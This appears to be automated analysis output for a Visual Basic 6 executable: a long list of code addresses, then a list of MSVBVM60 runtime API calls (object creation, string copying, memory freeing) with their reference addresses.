0x00415ecd
0x00415ed3
0x00415ed9
0x00415ede
0x00415ede
0x00415ef3
0x00415ef5
0x00415efb
0x00415f04
0x00415f0f
0x00415f1a
0x00415f1f
0x00415f2b
0x00415f2d
0x00415f33
0x00415f3c
0x00415f41
0x00415f4d
0x00415f4f
0x00415f55
0x00415f5e
0x00415f63
0x00415f71
0x00415f8e
0x00415f73
0x00415f73
0x00415f78
0x00415f7d
0x00415f82
0x00415f82
0x00415fb2
0x00415fb9
0x00415fbe
0x00415fd9
0x00415fdf
0x00415fe1
0x00415fee
0x00416013
0x00415ff0
0x00415ff0
0x00415ff5
0x00415ffa
0x00416000
0x00416006
0x0041600b
0x0041600b
0x00416020
0x00416022
0x00416028
0x00416031
0x0041603c
0x00416047
0x0041604c
0x00416058
0x0041605a
0x00416060
0x00416069
0x0041606e
0x0041607c
0x00416099
0x0041607e
0x0041607e
0x00416083
0x00416088
0x0041608d
0x0041608d
0x004160bd
0x004160c4
0x004160c9
0x004160e6
0x004160ec
0x004160ee
0x004160fb
0x00416120
0x004160fd
0x004160fd
0x00416102
0x00416107
0x0041610d
0x00416113
0x00416118
0x00416118
0x0041612d
0x0041612f
0x00416135
0x0041613e
0x00416149
0x00416154
0x00416159
0x00416167
0x00416184
0x00416169
0x00416169
0x0041616e
0x00416173
0x00416178
0x00416178
0x004161a8
0x004161af
0x004161b4
0x004161cf
0x004161d2
0x004161d4
0x004161e1
0x00416203
0x004161e3
0x004161e3
0x004161e5
0x004161ea
0x004161f0
0x004161f6
0x004161fb
0x004161fb
0x00416210
0x00416212
0x00416218
0x00416221
0x0041622c
0x00416237
0x0041623c
0x00416248
0x0041624a
0x00416250
0x00416259
0x0041625e
0x0041626c
0x00416289
0x0041626e
0x0041626e
0x00416273
0x00416278
0x0041627d
0x0041627d
0x004162ad
0x004162b4
0x004162b9
0x004162d6
0x004162dc
0x004162de
0x004162eb
0x00416310
0x004162ed
0x004162ed
0x004162f2
0x004162f7
0x004162fd
0x00416303
0x00416308
0x00416308
0x0041631d
0x0041631f
0x00416325
0x0041632e
0x00416339
0x00416344
0x00416349
0x00416355
0x00416357
0x0041635d
0x00416366
0x0041636b
0x00416379
0x00416396
0x0041637b
0x0041637b
0x00416380
0x00416385
0x0041638a
0x0041638a
0x004163ba
0x004163c1
0x004163c6
0x004163e1
0x004163e7
0x004163e9
0x004163f6
0x0041641b
0x004163f8
0x004163f8
0x004163fd
0x00416402
0x00416408
0x0041640e
0x00416413
0x00416413
0x00416428
0x0041642a
0x00416430
0x00416439
0x00416444
0x0041644f
0x00416454
0x00416462
0x0041647f
0x00416464
0x00416464
0x00416469
0x0041646e
0x00416473
0x00416473
0x004164a3
0x004164aa
0x004164af
0x004164ca
0x004164d0
0x004164d2
0x004164df
0x00416504
0x004164e1
0x004164e1
0x004164e6
0x004164eb
0x004164f1
0x004164f7
0x004164fc
0x004164fc
0x00416511
0x00416513
0x00416519
0x00416522
0x0041652d
0x00416538
0x0041653d
0x0041654b
0x00416568
0x0041654d
0x0041654d
0x00416552
0x00416557
0x0041655c
0x0041655c
0x0041658c
0x00416593
0x00416598
0x004165b3
0x004165b9
0x004165bb
0x004165c8
0x004165ed
0x004165ca
0x004165ca
0x004165cf
0x004165d4
0x004165da
0x004165e0
0x004165e5
0x004165e5
0x004165fa
0x004165fc
0x00416602
0x0041660b
0x00416616
0x00416621
0x00416626
0x00416632
0x00416634
0x0041663a
0x00416643
0x00416648
0x00416656
0x00416673
0x00416658
0x00416658
0x0041665d
0x00416662
0x00416667
0x00416667
0x00416697
0x0041669e
0x004166a3
0x004166c0
0x004166c6
0x004166c8
0x004166d5
0x004166fa
0x004166d7
0x004166d7
0x004166dc
0x004166e1
0x004166e7
0x004166ed
0x004166f2
0x004166f2
0x00416707
0x00416709
0x0041670f
0x00416718
0x00416723
0x0041672e
0x00416733
0x00416741
0x0041675e
0x00416743
0x00416743
0x00416748
0x0041674d
0x00416752
0x00416752
0x00416782
0x00416789
0x0041678e
0x004167a9
0x004167af
0x004167b1
0x004167be
0x004167e3
0x004167c0
0x004167c0
0x004167c5
0x004167ca
0x004167d0
0x004167d6
0x004167db
0x004167db
0x004167f0
0x004167f2
0x004167f8
0x00416801
0x0041680c
0x00416817
0x0041681c
0x0041682a
0x00416847
0x0041682c
0x0041682c
0x00416831
0x00416836
0x0041683b
0x0041683b
0x0041686b
0x00416872
0x00416877
0x00416892
0x00416898
0x0041689a
0x004168a7
0x004168cc
0x004168a9
0x004168a9
0x004168ae
0x004168b3
0x004168b9
0x004168bf
0x004168c4
0x004168c4
0x004168d9
0x004168db
0x004168e1
0x004168ea
0x004168f5
0x00416900
0x00416905
0x00416911
0x00416913
0x00416919
0x00416922
0x00416927
0x00416935
0x00416952
0x00416937
0x00416937
0x0041693c
0x00416941
0x00416946
0x00416946
0x00416976
0x0041697d
0x00416982
0x0041699d
0x004169a3
0x004169a5
0x004169b2
0x004169d7
0x004169b4
0x004169b4
0x004169b9
0x004169be
0x004169c4
0x004169ca
0x004169cf
0x004169cf
0x004169e4
0x004169e6
0x004169ec
0x004169f5
0x00416a00
0x00416a0b
0x00416a10
0x00416a1e
0x00416a3b
0x00416a20
0x00416a20
0x00416a25
0x00416a2a
0x00416a2f
0x00416a2f
0x00416a5f
0x00416a66
0x00416a6b
0x00416a86
0x00416a89
0x00416a8b
0x00416a98
0x00416aba
0x00416a9a
0x00416a9a
0x00416a9c
0x00416aa1
0x00416aa7
0x00416aad
0x00416ab2
0x00416ab2
0x00416ac7
0x00416ac9
0x00416acf
0x00416ad8
0x00416ae3
0x00416aee
0x00416af3
0x00416b01
0x00416b1e
0x00416b03
0x00416b03
0x00416b08
0x00416b0d
0x00416b12
0x00416b12
0x00416b42
0x00416b49
0x00416b4e
0x00416b69
0x00416b6f
0x00416b71
0x00416b7e
0x00416ba3
0x00416b80
0x00416b80
0x00416b85
0x00416b8a
0x00416b90
0x00416b96
0x00416b9b
0x00416b9b
0x00416bb0
0x00416bb2
0x00416bb8
0x00416bc1
0x00416bcc
0x00416bd7
0x00416bdc
0x00416bea
0x00416c07
0x00416bec
0x00416bec
0x00416bf1
0x00416bf6
0x00416bfb
0x00416bfb
0x00416c2b
0x00416c32
0x00416c37
0x00416c52
0x00416c58
0x00416c5a
0x00416c67
0x00416c8c
0x00416c69
0x00416c69
0x00416c6e
0x00416c73
0x00416c79
0x00416c7f
0x00416c84
0x00416c84
0x00416c99
0x00416c9b
0x00416ca1
0x00416caa
0x00416cb5
0x00416cc0
0x00416cc5
0x00416cd1
0x00416cd3
0x00416cd9
0x00416ce2
0x00416ce7
0x00416cf5
0x00416d12
0x00416cf7
0x00416cf7
0x00416cfc
0x00416d01
0x00416d06
0x00416d06
0x00416d36
0x00416d3d
0x00416d42
0x00416d5d
0x00416d60
0x00416d62
0x00416d6f
0x00416d91
0x00416d71
0x00416d71
0x00416d73
0x00416d78
0x00416d7e
0x00416d84
0x00416d89
0x00416d89
0x00416d9e
0x00416da0
0x00416da6
0x00416daf
0x00416dba
0x00416dc5
0x00416dca
0x00416dd8
0x00416df5
0x00416dda
0x00416dda
0x00416ddf
0x00416de4
0x00416de9
0x00416de9
0x00416e19
0x00416e20
0x00416e25
0x00416e40
0x00416e46
0x00416e48
0x00416e55
0x00416e7a
0x00416e57
0x00416e57
0x00416e5c
0x00416e61
0x00416e67
0x00416e6d
0x00416e72
0x00416e72
0x00416e87
0x00416e89
0x00416e8f
0x00416e98
0x00416ea3
0x00416eae
0x00416eb3
0x00416ebf
0x00416ec1
0x00416ec7
0x00416ed0
0x00416ed5
0x00416ee1
0x00416ee3
0x00416ee9
0x00416ef2
0x00416ef7
0x00416f03
0x00416f05
0x00416f0b
0x00416f14
0x00416f19
0x00416f27
0x00416f44
0x00416f29
0x00416f29
0x00416f2e
0x00416f33
0x00416f38
0x00416f38
0x00416f68
0x00416f6f
0x00416f74
0x00416f8f
0x00416f92
0x00416f94
0x00416fa1
0x00416fc3
0x00416fa3
0x00416fa3
0x00416fa5
0x00416faa
0x00416fb0
0x00416fb6
0x00416fbb
0x00416fbb
0x00416fd0
0x00416fd2
0x00416fd8
0x00416fe1
0x00416fec
0x00416ff7
0x00416ffc
0x00417008
0x0041700a
0x00417010
0x00417019
0x0041701e
0x0041702a
0x0041702c
0x00417032
0x0041703b
0x00417040
0x0041704e
0x0041706b
0x00417050
0x00417050
0x00417055
0x0041705a
0x0041705f
0x0041705f
0x0041708f
0x00417096
0x0041709b
0x004170b6
0x004170b9
0x004170bb
0x004170c8
0x004170ea
0x004170ca
0x004170ca
0x004170cc
0x004170d1
0x004170d7
0x004170dd
0x004170e2
0x004170e2
0x004170f7
0x004170f9
0x004170ff
0x00417108
0x00417113
0x0041711e
0x00417123
0x00417131
0x0041714e
0x00417133
0x00417133
0x00417138
0x0041713d
0x00417142
0x00417142
0x00417172
0x00417179
0x0041717e
0x00417199
0x0041719f
0x004171a1
0x004171ae
0x004171d3
0x004171b0
0x004171b0
0x004171b5
0x004171ba
0x004171c0
0x004171c6
0x004171cb
0x004171cb
0x004171e0
0x004171e2
0x004171e8
0x004171f1
0x004171fc
0x00417207
0x0041720c
0x00417218
0x0041721a
0x00417220
0x00417229
0x0041722e
0x0041723a
0x0041723c
0x00417242
0x0041724b
0x00417250
0x0041725e
0x0041727b
0x00417260
0x00417260
0x00417265
0x0041726a
0x0041726f
0x0041726f
0x0041729f
0x004172a6
0x004172ab
0x004172c6
0x004172cc
0x004172ce
0x004172db
0x00417300
0x004172dd
0x004172dd
0x004172e2
0x004172e7
0x004172ed
0x004172f3
0x004172f8
0x004172f8
0x0041730d
0x0041730f
0x00417315
0x0041731e
0x00417329
0x00417334
0x00417339
0x00417345
0x00417347
0x0041734d
0x00417356
0x0041735b
0x00417367
0x00417369
0x0041736f
0x00417378
0x0041737d
0x00417389
0x0041738b
0x00417391
0x0041739a
0x0041739f
0x004173ad
0x004173ca
0x004173af
0x004173af
0x004173b4
0x004173b9
0x004173be
0x004173be
0x004173ee
0x004173f5
0x004173fa
0x00417415
0x0041741b
0x0041741d
0x0041742a
0x0041744f
0x0041742c
0x0041742c
0x00417431
0x00417436
0x0041743c
0x00417442
0x00417447
0x00417447
0x00417456
0x00417458
0x0041745a
0x00417460
0x00417466
0x00417467
0x0041746f
0x00417470
0x0041747d
0x00417484
0x00417486
0x0041748c
0x00417495
0x004174a0
0x004174ab
0x004174b2
0x004174b3
0x004174b5
0x004174ba
0x004174c3
0x004174c8
0x004174d4
0x004174d6
0x004174dc
0x004174e5
0x004174ea
0x004174f8
0x00417515
0x004174fa
0x004174fa
0x004174ff
0x00417504
0x00417509
0x00417509
0x00417539
0x00417540
0x00417545
0x00417560
0x00417566
0x00417568
0x00417575
0x0041759a
0x00417577
0x00417577
0x0041757c
0x00417581
0x00417587
0x0041758d
0x00417592
0x00417592
0x004175a7
0x004175a9
0x004175af
0x004175b8
0x004175c3
0x004175ce
0x004175d3
0x004175df
0x004175e1
0x004175e7
0x004175f0
0x004175f5
0x00417601
0x00417603
0x00417609
0x00417612
0x00417617
0x00417623
0x00417625
0x0041762b
0x00417634
0x00417639
0x00417645
0x00417647
0x0041764d
0x00417656
0x0041765b
0x00417662
0x00417670
0x0041768d
0x00417672
0x00417672
0x00417677
0x0041767c
0x00417681
0x00417681
0x0041769f
0x004176a5
0x004176af
0x004176b9
0x004176c3
0x004176d7
0x004176e4
0x004176e5
0x004176e6
0x004176e7
0x004176eb
0x004176f8
0x004176f9
0x004176fa
0x004176fb
0x0041770a
0x0041770d
0x0041770f
0x0041771c
0x0041773e
0x0041771e
0x0041771e
0x00417720
0x00417725
0x0041772b
0x00417731
0x00417736
0x00417736
0x0041774b
0x00417752
0x00417753
0x0041775e
0x00417765
0x00417766
0x00417771
0x00417771
0x00417776
0x00417784
0x004177a1
0x00417786
0x00417786
0x0041778b
0x00417790
0x00417795
0x00417795
0x004177c5
0x004177cc
0x004177d1
0x004177d7
0x004177e1
0x004177ee
0x004177fb
0x004177fc
0x004177fd
0x004177fe
0x0041780d
0x00417813
0x00417815
0x00417822
0x00417847
0x00417824
0x00417824
0x00417829
0x0041782e
0x00417834
0x0041783a
0x0041783f
0x0041783f
0x00417854
0x00417859
0x00417860
0x0041786a
0x00417874
0x0041787a
0x0041787b
0x0041787d
0x0041788a
0x0041788f
0x00417890
0x00417895
0x0041789c
0x004178a2
0x004178af
0x004178ba
0x004178c8
0x004178ce
0x004178dc
0x004178f9
0x004178de
0x004178de
0x004178e3
0x004178e8
0x004178ed
0x004178ed
0x0041790b
0x00417926
0x00417929
0x0041792b
0x00417938
0x0041795a
0x0041793a
0x0041793a
0x0041793c
0x00417941
0x00417947
0x0041794d
0x00417952
0x00417952
0x00417967
0x00417982
0x00417988
0x0041798a
0x00417997
0x004179bc
0x00417999
0x00417999
0x0041799e
0x004179a3
0x004179a9
0x004179af
0x004179b4
0x004179b4
0x004179c9
0x004179cf
0x004179e2
0x004179ed
0x004179f2
0x00417a00
0x00417a1d
0x00417a02
0x00417a02
0x00417a07
0x00417a0c
0x00417a11
0x00417a11
0x00417a2f
0x00417a4a
0x00417a4d
0x00417a4f
0x00417a5c
0x00417a7e
0x00417a5e
0x00417a5e
0x00417a60
0x00417a65
0x00417a6b
0x00417a71
0x00417a76
0x00417a76
0x00417a8b
0x00417aa6
0x00417aac
0x00417aae
0x00417abb
0x00417ae0
0x00417abd
0x00417abd
0x00417ac2
0x00417ac7
0x00417acd
0x00417ad3
0x00417ad8
0x00417ad8
0x00417aed
0x00417af3
0x00417b06
0x00417b11
0x00417b16
0x00417b1d
0x00417b2b
0x00417b48
0x00417b2d
0x00417b2d
0x00417b32
0x00417b37
0x00417b3c
0x00417b3c
0x00417b6c
0x00417b73
0x00417b78
0x00417b93
0x00417b99
0x00417b9b
0x00417ba8
0x00417bcd
0x00417baa
0x00417baa
0x00417baf
0x00417bb4
0x00417bba
0x00417bc0
0x00417bc5
0x00417bc5
0x00417bd4
0x00417bd6
0x00417bd8
0x00417be4
0x00417be5
0x00417bea
0x00417bf4
0x00417c11
0x00417bf6
0x00417bf6
0x00417bfb
0x00417c00
0x00417c05
0x00417c05
0x00417c35
0x00417c3c
0x00417c41
0x00417c5c
0x00417c5f
0x00417c61
0x00417c6e
0x00417c90
0x00417c70
0x00417c70
0x00417c72
0x00417c77
0x00417c7d
0x00417c83
0x00417c88
0x00417c88
0x00417c9e
0x00417cbb
0x00417ca0
0x00417ca0
0x00417ca5
0x00417caa
0x00417caf
0x00417caf
0x00417ccd
0x00417ce8
0x00417ceb
0x00417ced
0x00417cfa
0x00417d1c
0x00417cfc
0x00417cfc
0x00417cfe
0x00417d03
0x00417d09
0x00417d0f
0x00417d14
0x00417d14
0x00417d29
0x00417d3c
0x00417d43
0x00417d50
0x00417d64
0x00417d67
0x00417d69
0x00417d76
0x00417d98
0x00417d78
0x00417d78
0x00417d7a
0x00417d7f
0x00417d85
0x00417d8b
0x00417d90
0x00417d90
0x00417da5
0x00417dab
0x00417dbb
0x00417dc6
0x00417dcd
0x00417dce
0x00417dd0
0x00417dde
0x00417de5
0x00417dec
0x00417df3
0x00417df4
0x00417df6
0x00417dfb
0x00417e04
0x00417e04
0x00417e09
0x00417e10
0x00417e1a
0x00417e24
0x00417e2a
0x00417e30
0x00417e3b
0x00417e42
0x00417e43
0x00417e48
0x00417e52
0x00417e62
0x00417e63
0x00417e69
0x00417e6a
0x00417e6f
0x00417e7c
0x00417e83
0x00417e84
0x00417e86
0x00417e97
0x00417e9d
0x00417ea4
0x00417eae
0x00417eb8
0x00417ebf
0x00417ec4
0x00417ed1
0x00417ed6
0x00417edd
0x00417ee7
0x00417ef1
0x00417ef8
0x00417efd
0x00417f02
0x00417f07
0x00417f0d
0x00417f12
0x00417f26
0x00417f2c
0x00417f2e
0x00417f34
0x00417f3b
0x00417f5d
0x00417f3d
0x00417f3d
0x00417f42
0x00417f47
0x00417f4a
0x00417f50
0x00417f55
0x00417f55
0x00417f3b
0x00417f64
0x00417f6b
0x00417f6d
0x00417f6e
0x00417f6f
0x00417f72
0x00417f77
0x00417f7c
0x00417f82
0x00417f84
0x00417f85
0x00417f87
0x00417f8e
0x00417f94
0x00417f95
0x00417f9a
0x00417fa6
0x00417fab
0x00417fb2
0x00417fb4
0x00417fb9
0x00417fc0
0x00417fc7
0x00417fcc
0x00417fd1
0x00417fd1
0x00417fd4
0x00417fe3
0x00417fe9
0x00417ff6
0x00418018
0x00417ff8
0x00417ff8
0x00417ffd
0x00418002
0x00418005
0x0041800b
0x00418010
0x00418010
0x0041801f
0x00418035
0x00418041
0x00418044
0x0041804b
0x00418055
0x00418078
0x0041807e
0x0041808d
0x00418093
0x004180a2
0x004180a8
0x004180b5
0x004180d7
0x004180b7
0x004180b7
0x004180bc
0x004180c1
0x004180c4
0x004180ca
0x004180cf
0x004180cf
0x004180de
0x004180e5
0x004180ef
0x004180f9
0x00418103
0x0041810d
0x00418114
0x00418124
0x0041812b
0x00418132
0x00418139
0x00418140
0x00418141
0x00418144
0x00418145
0x0041814a
0x00418342
0x00418155
0x0041816b
0x00418177
0x0041817d
0x00418193
0x004181a0
0x004181a7
0x004181bd
0x004181c3
0x004181d0
0x004181f2
0x004181d2
0x004181d2
0x004181d7
0x004181dc
0x004181df
0x004181e5
0x004181ea
0x004181ea
0x004181ff
0x00418205
0x0041821b
0x00418227
0x0041822a
0x00418238
0x00418255
0x0041823a
0x0041823a
0x0041823f
0x00418244
0x00418249
0x00418249
0x00418279
0x00418280
0x00418285
0x004182a0
0x004182a6
0x004182a8
0x004182b5
0x004182da
0x004182b7
0x004182b7
0x004182bc
0x004182c1
0x004182c7
0x004182cd
0x004182d2
0x004182d2
0x004182e7
0x00418302
0x0041830e
0x00418319
0x0041831e
0x0041832b
0x00418332
0x00418333
0x00418336
0x00418337
0x0041833c
0x0041833c
0x0041834f
0x00418356
0x00418368
0x0041836b
0x0041836c

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 00414212
__vbaNew2.MSVBVM60(00404370,00425010,?,?,?,?,00401536), ref: 00414268
__vbaObjSet.MSVBVM60(?,00000000), ref: 004142A4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000130), ref: 004142F1
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00414316
__vbaNew2.MSVBVM60(00404370,00425010,?,?,?,00401536), ref: 00414331
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041436D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405060,00000158), ref: 004143BA
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004143DF
__vbaNew2.MSVBVM60(00404370,00425010,?,?,?,?,?,?,?,00401536), ref: 004143FA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414436
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405060,00000158), ref: 00414483
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004144A8
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00401536), ref: 004144B1
__vbaI4Var.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00401536), ref: 004144BE
__vbaI4Var.MSVBVM60(?,00000000,?,00000000,00000000), ref: 004144CB
__vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000,00000000), ref: 004144DC
__vbaNew2.MSVBVM60(00404370,00425010,00000000,?,00000000,?,00000000,00000000), ref: 004144F4
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414530
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405060,00000060), ref: 00414577
__vbaFreeObjList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 004145D8
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000), ref: 004145F7
#648.MSVBVM60(0000000A), ref: 00414630
__vbaFreeVar.MSVBVM60(0000000A), ref: 00414642
__vbaNew2.MSVBVM60(00405090,00425698,0000000A), ref: 00414661
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,0000004C), ref: 004146C6
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050A0,00000028), ref: 0041471B
__vbaFreeObj.MSVBVM60(00000000,?,004050A0,00000028), ref: 00414735
#570.MSVBVM60(00000074), ref: 0041474A
__vbaNew2.MSVBVM60(00404370,00425010,?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000), ref: 0041476C
__vbaObjSet.MSVBVM60(?,00000000), ref: 004147A8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405060,00000180), ref: 004147F5
__vbaNew2.MSVBVM60(00404370,00425010), ref: 0041481C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414858
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405060,00000100), ref: 004148A5
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004148CA
__vbaNew2.MSVBVM60(00404370,00425010,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 004148E5
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414921
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050B0,00000110), ref: 0041496E
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00414993
__vbaNew2.MSVBVM60(00404370,00425010), ref: 004149AE
__vbaObjSet.MSVBVM60(?,00000000), ref: 004149EA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,00000198), ref: 00414A37
__vbaI4Var.MSVBVM60(?,?,?,?,?), ref: 00414A6A
__vbaI4Var.MSVBVM60(?,00000000,?,?,?,?,?), ref: 00414A77
__vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?,?,?,?,?), ref: 00414A8E
__vbaFreeObjList.MSVBVM60(00000006,?,?,?,?,?,?,?,00000000,?,00000000,?,?,?,?,?), ref: 00414AD7
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00414AEF
__vbaNew2.MSVBVM60(00405090,00425698), ref: 00414B20
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 00414B85
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000078), ref: 00414BE1
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,00000078), ref: 00414C06
__vbaNew2.MSVBVM60(00405090,00425698), ref: 00414C25
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 00414C8A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000140), ref: 00414CEC
__vbaFreeObj.MSVBVM60(00000000,?,004050C0,00000140), ref: 00414D11
__vbaNew2.MSVBVM60(00405090,00425698), ref: 00414D30
__vbaObjVar.MSVBVM60(00000000), ref: 00414D5D
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 00414D6A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000010), ref: 00414DA5
__vbaFreeObj.MSVBVM60(00000000,?,00405080,00000010), ref: 00414DBF
__vbaNew2.MSVBVM60(00404370,00425010), ref: 00414DDE
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414E1A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,0000020C), ref: 00414E60
__vbaFreeObj.MSVBVM60(00000000,?,00405050,0000020C), ref: 00414E7A
#647.MSVBVM60(?,0000000A), ref: 00414EA8
__vbaVarTstEq.MSVBVM60(00008008,?,?,0000000A), ref: 00414ECF
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,00008008,?,?,0000000A), ref: 00414EEB
#680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00414F73
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00414F95
#610.MSVBVM60(?), ref: 00414FAB
#552.MSVBVM60(?,?,00000001,?), ref: 00414FC0
__vbaVarMove.MSVBVM60(?,?,00000001,?), ref: 00414FCE
__vbaFreeVar.MSVBVM60(?,?,00000001,?), ref: 00414FD9
__vbaNew2.MSVBVM60(00404370,00425010), ref: 00415077
__vbaObjSet.MSVBVM60(?,00000000), ref: 004150B3
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050B0,00000120), ref: 00415100
#596.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041516E
__vbaStrMove.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00415178
__vbaFreeObj.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00415183
__vbaFreeVarList.MSVBVM60(00000007,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 004151BB
__vbaI4Str.MSVBVM60(004050F8), ref: 004151CF
__vbaNew2.MSVBVM60(00405090,00425698,004050F8), ref: 004151F7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014), ref: 0041525C
__vbaNew2.MSVBVM60(00404370,00425010), ref: 004152A3
__vbaObjSet.MSVBVM60(?,00000000), ref: 004152DF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000001C0), ref: 0041532C
__vbaChkstk.MSVBVM60(00000000,?,00405050,000001C0), ref: 00415343
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,0000013C), ref: 00415395
__vbaFreeStr.MSVBVM60(00000000,?,004050C0,0000013C), ref: 004153AF
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004153C4
__vbaRedim.MSVBVM60(00000180,00000004,?,00000008,00000001,00000044,00000000,?,?,004050F8), ref: 004153E9
__vbaDerefAry1.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004050F8), ref: 00415405
__vbaStrCopy.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004050F8), ref: 0041540E
__vbaNew2.MSVBVM60(00404370,00425010,?,00000000,?,?,?,?,?,?,?,?,?,004050F8), ref: 0041542D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415469
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000001C0), ref: 004154B6
__vbaDerefAry1.MSVBVM60(?,00000001), ref: 004154D8
__vbaStrCopy.MSVBVM60(?,00000001), ref: 004154E1
__vbaFreeStr.MSVBVM60(?,00000001), ref: 004154EC
__vbaFreeObj.MSVBVM60(?,00000001), ref: 004154F7
__vbaDerefAry1.MSVBVM60(?,00000002,?,00000001), ref: 00415510
__vbaStrCopy.MSVBVM60(?,00000002,?,00000001), ref: 00415519
__vbaDerefAry1.MSVBVM60(?,00000003,?,00000002,?,00000001), ref: 00415532
__vbaStrCopy.MSVBVM60(?,00000003,?,00000002,?,00000001), ref: 0041553B
__vbaNew2.MSVBVM60(00404370,00425010,?,00000003,?,00000002,?,00000001), ref: 0041555A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415596
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000000A8), ref: 004155E3
__vbaDerefAry1.MSVBVM60(?,00000004), ref: 00415605
__vbaStrCopy.MSVBVM60(?,00000004), ref: 0041560E
__vbaFreeStr.MSVBVM60(?,00000004), ref: 00415619
__vbaFreeObj.MSVBVM60(?,00000004), ref: 00415624
__vbaNew2.MSVBVM60(00404370,00425010,?,00000004), ref: 00415643
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041567F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405060,00000048), ref: 004156C6
__vbaDerefAry1.MSVBVM60(?,00000005), ref: 004156E8
__vbaStrCopy.MSVBVM60(?,00000005), ref: 004156F1
__vbaFreeStr.MSVBVM60(?,00000005), ref: 004156FC
__vbaFreeObj.MSVBVM60(?,00000005), ref: 00415707
__vbaDerefAry1.MSVBVM60(?,00000006,?,00000005), ref: 00415720
__vbaStrCopy.MSVBVM60(?,00000006,?,00000005), ref: 00415729
__vbaDerefAry1.MSVBVM60(?,00000007,?,00000006,?,00000005), ref: 00415742
__vbaStrCopy.MSVBVM60(?,00000007,?,00000006,?,00000005), ref: 0041574B
__vbaDerefAry1.MSVBVM60(?,00000008,?,00000007,?,00000006,?,00000005), ref: 00415764
__vbaStrCopy.MSVBVM60(?,00000008,?,00000007,?,00000006,?,00000005), ref: 0041576D
__vbaDerefAry1.MSVBVM60(?,00000009,?,00000008,?,00000007,?,00000006,?,00000005), ref: 00415786
__vbaStrCopy.MSVBVM60(?,00000009,?,00000008,?,00000007,?,00000006,?,00000005), ref: 0041578F
__vbaNew2.MSVBVM60(00404370,00425010,?,00000009,?,00000008,?,00000007,?,00000006,?,00000005), ref: 004157AE
__vbaObjSet.MSVBVM60(?,00000000), ref: 004157EA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000000F8), ref: 00415839
__vbaDerefAry1.MSVBVM60(?,0000000A), ref: 0041585B
__vbaStrCopy.MSVBVM60(?,0000000A), ref: 00415864
__vbaFreeStr.MSVBVM60(?,0000000A), ref: 0041586F
__vbaFreeObj.MSVBVM60(?,0000000A), ref: 0041587A
__vbaNew2.MSVBVM60(00404370,00425010,?,0000000A), ref: 00415899
__vbaObjSet.MSVBVM60(?,00000000), ref: 004158D5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405060,00000130), ref: 00415922
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00415947
__vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004050F8), ref: 00415950
__vbaStrMove.MSVBVM60(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004050F8), ref: 0041595D
__vbaDerefAry1.MSVBVM60(?,0000000B,00000000,?,?,?,00000000), ref: 0041596C
